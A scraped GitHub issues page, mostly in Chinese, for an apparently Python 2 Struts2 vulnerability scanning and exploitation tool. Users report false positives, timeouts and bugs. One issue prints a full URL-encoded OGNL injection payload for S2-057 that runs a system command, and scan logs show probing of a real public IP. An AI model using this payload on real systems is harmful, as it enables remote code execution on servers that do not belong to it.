- 🌱 I’m currently learning blueteam backtracking
- Visitor Count
Python2编写的struts2漏洞全版本检测和利用工具
老铁,这里是不是有点问题:
struts-scan.py 的 534 和 535
surl = self.url[self.url.rfind('/')::]
rurl = self.url.replace(surl, "") + self.shell["struts2-057-1"].replace("FUZZINGCOMMAND", command) + surl
print 出来(目标是 192.168.1.1:80) :
surl 是 /192.168.1.1:80
rurl 是 http://%24%7B%28%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%28@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27netstat -an%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/172.16.16.13:80
话说052和053出来有段日子,也有exp了,大佬抽空可以加上唉~
hi,readme里“https://github.com/Ivan1ee/struts2-057-exp。” 链接多了个句号。
难道哪儿有问题?好多漏洞发现不了?
我看代码是:
req = requests.get(self.url+'/?redirect:https://www.baidu.com/%23', timeout=TMOUT, verify=False)
if req.status_code == 302:
cprint("目标存在struts2-017漏洞..(只提供检测)", "red")
filecontent.writelines("struts2-017 success!!!\n")
然后公网上很多服务器,无论对什么请求都返回 302 重定向到 baidu ....
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Wed, 15 Apr 2020 07:44:12 GMT
Content-Type: text/html
Content-Length: 154
Connection: keep-alive
Location: http://www.baidu.com/
Does S009, S013, S032, S037 vulnerabilities work¿? Because the other ones are scanned and identified correctly but those I told you, have you found any struts vulnerable to those ones¿? Thanks
struts2-048的检查方法和网上看到的045的方法差不多,和048的描述不符https://cwiki.apache.org/confluence/display/WW/S2-048
检测struts2漏洞--------
目标url:http://119.254.9.210/channel/doChannelList.action
检测struts2-005超时..
超时原因: HTTPConnectionPool(host='119.254.9.210', port=80): Max retries exceeded with url: /channel/doChannelList.action (Caused by ConnectTimeoutError(<urllib3.connection.HTTPConnection object at 0x191a790>, 'Connection to 119.254.9.210 timed out. (connect timeout=6)'))
检测struts2-009超时..
超时原因: HTTPConnectionPool(host='119.254.9.210', port=80): Max retries exceeded with url: /channel/doChannelList.action (Caused by ConnectTimeoutError(<urllib3.connection.HTTPConnection object at 0x191afd0>, 'Connection to 119.254.9.210 timed out. (connect timeout=6)'))
检测struts2-013超时..
超时原因: HTTPConnectionPool(host='119.254.9.210', port=80): Max retries exceeded with url: /channel/doChannelList.action (Caused by ConnectTimeoutError(<urllib3.connection.HTTPConnection object at 0x191af50>, 'Connection to 119.254.9.210 timed out. (connect timeout=6)'))
检测struts2-016超时..
超时原因: HTTPConnectionPool(host='119.254.9.210', port=80): Max retries exceeded with url: /channel/doChannelList.action (Caused by ConnectTimeoutError(<urllib3.connection.HTTPConnection object at 0x191a6d0>, 'Connection to 119.254.9.210 timed out. (connect timeout=6)'))
检测struts2-019超时..
超时原因: HTTPConnectionPool(host='119.254.9.210', port=80): Max retries exceeded with url: /channel/doChannelList.action (Caused by ConnectTimeoutError(<urllib3.connection.HTTPConnection object at 0x191af10>, 'Connection to 119.254.9.210 timed out. (connect timeout=6)'))
检测struts2-devmode超时..
Vulhub上的Struts2漏洞环境(http://vulhub.org/#/environments/struts2/s2-016/),同时存在S2-016/045/046漏洞,使用shack2或PKAV的Struts2检测工具均可以发现这三个漏洞,但在Linux环境使用struts-scan-linux,三个漏洞均不能发现。
struts-scan-linux检测结果,Struts2-016提示超时,S2-045/046提示不存在漏洞。通过交互式命令,s2-016可以利用成功,s2-045/46无法利用。
11月5日的新漏洞
整理的不错,一些小细节可以优化下,url的拼接方面urlparse.urljoin更加严谨点,避免一些漏扫,命令执行测试可以用set /a 654321 * 789 && expr 654321 * 789 || echo,简化check函数;006的可以加上去
批量检查结果不保存= =尴尬!
建议使用click或者其他库优化命令行;整个程序的所有struts漏洞的验证和批量扫描全部是单线程操作,若超时严重会很浪费时间,建议使用多线程优化,有空我自己也优化一下^_^
执行python struts-scan.py [url]
报出:
File "struts-scan.py", line 195
print prompt,
^
SyntaxError: Missing parentheses in call to 'print'
是我使用的姿势不对么?
比如s2-053检测 命令是这样的吗?
example:
struts-scan.exe+url+username=admin
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.